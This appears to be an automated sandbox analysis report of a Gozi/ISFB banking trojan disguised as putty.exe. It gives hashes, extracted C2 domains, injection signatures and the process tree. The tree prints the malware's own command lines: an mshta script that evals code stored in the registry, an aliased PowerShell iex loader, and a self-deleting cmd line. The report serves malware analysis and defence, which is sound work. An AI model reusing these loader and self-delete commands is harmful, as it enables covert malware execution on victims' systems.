gozi | 713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

Analysis

max time kernel
150s
max time network
125s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
06-10-2023 14:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

putty.exe
Size

292KB
MD5

f63d00d962c43095a6de3838401e5b59
SHA1

c49feab758326a965d30fef2807291cf39c0d61a
SHA256

713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf
SHA512

12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7
SSDEEP

3072:/girqLkRXUklcl8F0W6IbV418GM7cCtHEaV0AtdQa9l0Ck5jU:/gY9RJ2l8Nrdb3Q8l0Zj

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

http://igrovdow.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

268 cmd.exe

pid	process
268	cmd.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3008 set thread context of 1192	3008	powershell.exe	Explorer.EXE
PID 1192 set thread context of 268	1192	Explorer.EXE	cmd.exe
PID 268 set thread context of 888	268	cmd.exe	PING.EXE
PID 1192 set thread context of 2052	1192	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

888 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

888 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
888	PING.EXE

pid	process
888	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

putty.exepowershell.exeExplorer.EXE

pid	process
2468	putty.exe
3008	powershell.exe
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE
1192	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1192 Explorer.EXE
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

3008 powershell.exe
1192 Explorer.EXE
268 cmd.exe
1192 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3008 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

1192 Explorer.EXE

pid	process
1192	Explorer.EXE

pid	process
3008	powershell.exe
1192	Explorer.EXE
268	cmd.exe
1192	Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	3008	powershell.exe

pid	process
1192	Explorer.EXE

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2512 wrote to memory of 3008	2512	mshta.exe	powershell.exe
PID 2512 wrote to memory of 3008	2512	mshta.exe	powershell.exe
PID 2512 wrote to memory of 3008	2512	mshta.exe	powershell.exe
PID 3008 wrote to memory of 2876	3008	powershell.exe	csc.exe
PID 3008 wrote to memory of 2876	3008	powershell.exe	csc.exe
PID 3008 wrote to memory of 2876	3008	powershell.exe	csc.exe
PID 2876 wrote to memory of 2992	2876	csc.exe	cvtres.exe
PID 2876 wrote to memory of 2992	2876	csc.exe	cvtres.exe
PID 2876 wrote to memory of 2992	2876	csc.exe	cvtres.exe
PID 3008 wrote to memory of 2192	3008	powershell.exe	csc.exe
PID 3008 wrote to memory of 2192	3008	powershell.exe	csc.exe
PID 3008 wrote to memory of 2192	3008	powershell.exe	csc.exe
PID 2192 wrote to memory of 2028	2192	csc.exe	cvtres.exe
PID 2192 wrote to memory of 2028	2192	csc.exe	cvtres.exe
PID 2192 wrote to memory of 2028	2192	csc.exe	cvtres.exe
PID 3008 wrote to memory of 1192	3008	powershell.exe	Explorer.EXE
PID 3008 wrote to memory of 1192	3008	powershell.exe	Explorer.EXE
PID 3008 wrote to memory of 1192	3008	powershell.exe	Explorer.EXE
PID 1192 wrote to memory of 268	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 268	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 268	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 268	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 268	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 268	1192	Explorer.EXE	cmd.exe
PID 268 wrote to memory of 888	268	cmd.exe	PING.EXE
PID 268 wrote to memory of 888	268	cmd.exe	PING.EXE
PID 268 wrote to memory of 888	268	cmd.exe	PING.EXE
PID 268 wrote to memory of 888	268	cmd.exe	PING.EXE
PID 268 wrote to memory of 888	268	cmd.exe	PING.EXE
PID 268 wrote to memory of 888	268	cmd.exe	PING.EXE
PID 1192 wrote to memory of 2052	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 2052	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 2052	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 2052	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 2052	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 2052	1192	Explorer.EXE	cmd.exe
PID 1192 wrote to memory of 2052	1192	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1192

C:\Users\Admin\AppData\Local\Temp\putty.exe
"C:\Users\Admin\AppData\Local\Temp\putty.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2468

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xp9x='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xp9x).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\30BA078A-CF87-E252-D964-73361DD857CA\\\TimeContact'));if(!window.flag)close()</script>"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name arprwdoola -value gp; new-alias -name mlqghjuug -value iex; mlqghjuug ([System.Text.Encoding]::ASCII.GetString((arprwdoola "HKCU:Software\AppDataLow\Software\Microsoft\30BA078A-CF87-E252-D964-73361DD857CA").ChartText))
3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3008

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kjo5xxqz.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2876

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA297.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA296.tmp"
5⤵
PID:2992

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\9_iyxb6l.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2192

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA314.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA313.tmp"
5⤵
PID:2028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\putty.exe"
2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:268

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:888

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:2052

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9_iyxb6l.dll
Filesize
3KB

MD5
42acb6ffd2c1199538198ea9dbaa6758

SHA1
d440b3c32247888acbd4eed6a12b0490ab7d3c58

SHA256
579a29a6263e2f88ff481256b8adc6db9b69923061bdfce198b0be1936d18112

SHA512
d088c8429f77e976398085cec92d71d6178971a450ae8c6251d612d63934986aaafcede357d9751c1e19c2b881bdc48bbd31a9d947cac1d3a9db73ddd9c265f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\9_iyxb6l.pdb
Filesize
7KB

MD5
6eba1e8675916e4562ef12fe7f58b458

SHA1
2eace68d524c6a642f64553141cbbec7c90fc7b8

SHA256
27e1acb4af566d686eb08f71e9615f2fc8f461e969011429713f428723245b55

SHA512
1802ffd76bdf12fd32cac2fc288a487a2db98de5a52eaf59938d2452a04a0fec0e3c32e73d726c963e25f20fab18a30350c31af055755721edaa671f08891ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA297.tmp
Filesize
1KB

MD5
807dec27f1ef756931f6b9a594195653

SHA1
e535a72d50e40fd8c1c4680ddffa194bca2e0546

SHA256
6fa4f09abe8613eab9a918d8f9f0becb020e4522756f9bab202786a61641f68b

SHA512
e420134cd86ef9f365ae8930ecbe16a572e87e5474133e85a7fe02917a2ed5c786c3efe8018bd92bc8ceae9f64e95ee1375e92ee46157687eab2b6210c028534

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA314.tmp
Filesize
1KB

MD5
02a24bc723cb7d2c7da9d7b025b4251a

SHA1
99d3338a656f25974346c1611e090454ca449c6c

SHA256
db133d3667f008dddd0aa23fe490a1ce3c00caf41544a99ec5d3e2b02b9009a1

SHA512
f7e5453b8703ad9ecf263eedd12c413b332511c1cef01bebf72ae6a3fc871464fad36b75b63f7d82a4e5d465c9235fe86e291b4c9788a52c521b3a258aca58a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\kjo5xxqz.dll
Filesize
3KB

MD5
854c7ebfb3e3ba7ee1c39640e1e1bb14

SHA1
48d2a1cfb0c766a0de4a088cd5b8ae7b111425e9

SHA256
4d22664b068526f821e82aa53637baf329f4164e3dbb2d80bbf081937d3f731c

SHA512
7ddee08d114dba3de4c4447e0a394b126cc13f5da9471d9e83d625d7209b1e5e1b586766afd1bd59d06c8cfdf9b6f599f351b9d895986b1e45fca2d443963d31

Download Submit
C:\Users\Admin\AppData\Local\Temp\kjo5xxqz.pdb
Filesize
7KB

MD5
b0860581c0e543c7a77d34f91a34eb13

SHA1
1ae2ee9f40f964c0a35633c910ce0cadf85cded3

SHA256
4b07d019cb1080b21042e21b65f7ef2182337b3a3d77ab07a8f06069258d22de

SHA512
fc3579a402efb604af7b1b829b8baed021bc825a9879518f7e9ce14a574a213443a4f4ae5bd8d66c389571b9e94a500ecd343dd196f2b0d999280189fbabcacf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\9_iyxb6l.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\9_iyxb6l.cmdline
Filesize
309B

MD5
5335a7c7de08bfa0d00937749d57e0cc

SHA1
b19811b8f8dd2b31047a6cbeee6325f04e403df5

SHA256
bd6856b1463976af651333cbd4a13fb15f2fb1d4cf7b0fc7a57c748e6d7a7631

SHA512
610a6537df7db46228b22c33f9f6244ad76e832c68938e5498a611afe87bd03d61693deb1869f81e0a022e42dc44975f385d50322fd906f2faab55a796a84006

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA296.tmp
Filesize
652B

MD5
9aa778223be819594a022106d57524de

SHA1
3ede641fc866bddbb1afcd555e2bd6eac830ae9b

SHA256
1ecd46ae4120035f5f23f3a87eb8a0600013321c96009dd4bbfb3a9b498d2b93

SHA512
8aa0dbcb6f0c2059ac878c12f737868d861af4fb8c0dfeb1120f56237fe443a36cbbbfeea91594bac39ec7d49c7ac24d0f0dab8fa4efa5727cfe33b1879434c2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA313.tmp
Filesize
652B

MD5
5ca39ddfd9b61236be068054c38dc99f

SHA1
6c8a93ca076844a58a45eb56b4dff55fd903bb8c

SHA256
ef17dccf32100c22815b1f9b329c07e81ed1e3a7258a55f4e3e383c0f5a9b78a

SHA512
ec4ba5c8000c25238f1424fd89e11e3510229a6166a9e14eac8a0fdcbd2e9dac29d8e35717a2f3bd63e84e01a1f654333ecd64214743874d5f38b89ab831c36c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kjo5xxqz.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kjo5xxqz.cmdline
Filesize
309B

MD5
873119425de5bb6da1ccd6f346405694

SHA1
cea6b5abaf2b30cc563f04c2869599576d12ebf4

SHA256
a7db58a4732711c7b95e90a8674ea7f4f0fbfc06a4c4a739b2dd6a880416654d

SHA512
4e1ac42b8f89c4ff1b404fa947f4d454ab38b960c46aec6e53d4d541415cb6348f6a79d6cb6efac284945653f01a327778b79ce9d68885642c835f9fcdb4a785

Download Submit
memory/268-66-0x000007FFFFFDD000-0x000007FFFFFDE000-memory.dmp

Filesize
4KB

Download
memory/268-67-0x0000000000380000-0x0000000000424000-memory.dmp

Filesize
656KB

Download
memory/268-88-0x0000000000380000-0x0000000000424000-memory.dmp

Filesize
656KB

Download
memory/268-68-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/888-87-0x00000000001B0000-0x0000000000254000-memory.dmp

Filesize
656KB

Download
memory/888-74-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/888-75-0x00000000001B0000-0x0000000000254000-memory.dmp

Filesize
656KB

Download
memory/888-73-0x000007FFFFFD6000-0x000007FFFFFD7000-memory.dmp

Filesize
4KB

Download
memory/1192-55-0x0000000004C80000-0x0000000004D24000-memory.dmp

Filesize
656KB

Download
memory/1192-56-0x0000000002AC0000-0x0000000002AC1000-memory.dmp

Filesize
4KB

Download
memory/1192-86-0x0000000004C80000-0x0000000004D24000-memory.dmp

Filesize
656KB

Download
memory/2052-85-0x0000000000220000-0x00000000002B8000-memory.dmp

Filesize
608KB

Download
memory/2052-84-0x0000000000220000-0x00000000002B8000-memory.dmp

Filesize
608KB

Download
memory/2052-83-0x00000000001A0000-0x00000000001A1000-memory.dmp

Filesize
4KB

Download
memory/2052-80-0x0000000000220000-0x00000000002B8000-memory.dmp

Filesize
608KB

Download
memory/2468-1-0x0000000000270000-0x0000000000370000-memory.dmp

Filesize
1024KB

Download
memory/2468-79-0x0000000000270000-0x0000000000370000-memory.dmp

Filesize
1024KB

Download
memory/2468-8-0x0000000000270000-0x0000000000370000-memory.dmp

Filesize
1024KB

Download
memory/2468-2-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2468-7-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2468-4-0x0000000000250000-0x000000000025D000-memory.dmp

Filesize
52KB

Download
memory/2468-10-0x0000000004CC0000-0x0000000004CC2000-memory.dmp

Filesize
8KB

Download
memory/2468-3-0x00000000001B0000-0x00000000001BB000-memory.dmp

Filesize
44KB

Download
memory/3008-65-0x0000000002A70000-0x0000000002AAD000-memory.dmp

Filesize
244KB

Download
memory/3008-16-0x00000000024E0000-0x00000000024E8000-memory.dmp

Filesize
32KB

Download
memory/3008-17-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp

Filesize
9.6MB

Download
memory/3008-18-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/3008-15-0x000000001B350000-0x000000001B632000-memory.dmp

Filesize
2.9MB

Download
memory/3008-35-0x00000000026E0000-0x00000000026E8000-memory.dmp

Filesize
32KB

Download
memory/3008-51-0x00000000026F0000-0x00000000026F8000-memory.dmp

Filesize
32KB

Download
memory/3008-54-0x0000000002A70000-0x0000000002AAD000-memory.dmp

Filesize
244KB

Download
memory/3008-64-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp

Filesize
9.6MB

Download
memory/3008-21-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp

Filesize
9.6MB

Download
memory/3008-19-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/3008-20-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download